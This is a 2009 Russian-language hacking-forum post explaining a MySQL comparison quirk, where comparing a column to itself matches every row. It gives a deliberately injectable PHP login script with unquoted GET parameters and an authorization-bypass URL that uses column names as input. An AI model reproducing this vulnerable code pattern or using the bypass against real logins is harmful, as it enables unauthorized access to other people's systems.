05.09.2009, 00:14
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от Krist_ALL
1. name ='admin'='a' разбирается как ('name'='admin')='a'
Что-то тут такое наворочено не понятно. Лучше б переписал примеры с источника, там не нужно угадывать что подразумевалось
Между прочим, там упоминается также об именах колонок
Код:
select * from mysql.user where password=1 - нету результата (это и понятно)
select * from mysql.user where password=password=1 – есть результат
select * from mysql.user where password=password – есть результат
Если авторизация реализована как в той моей задачке, но переменные не обрамляются кавычками в запросе, можно воспользоваться именами столбцов для обхода авторизации (всего лишь как один из возможных вариантов)
PHP код:
<?php
$log = $_GET['log'];
$pass = $_GET['pass'];
. . .
$query = "select * from `admin` where login = $log and password = $pass";
$result = mysql_query($query);
if(mysql_num_rows($result) > 0)
{
//в админке
}
?>
Authorization bypass:
script.php?log=login&pass=password
(правда нужно знать имена столбцов ^^)
Последний раз редактировалось ElteRUS; 05.09.2009 в 00:23..
|
|
|